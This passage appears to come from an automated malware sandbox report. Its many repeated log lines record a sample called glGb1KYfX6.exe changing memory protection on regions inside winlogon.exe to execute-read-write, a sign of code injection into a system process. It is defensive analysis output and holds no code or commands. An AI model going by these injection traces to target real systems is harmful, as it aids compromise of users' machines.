Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C974000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C976000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C978000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C980000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C981000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C994000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C996000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C998000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9B8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9D8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9F8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE58000 protect: page execute and read and writeJump to behavior
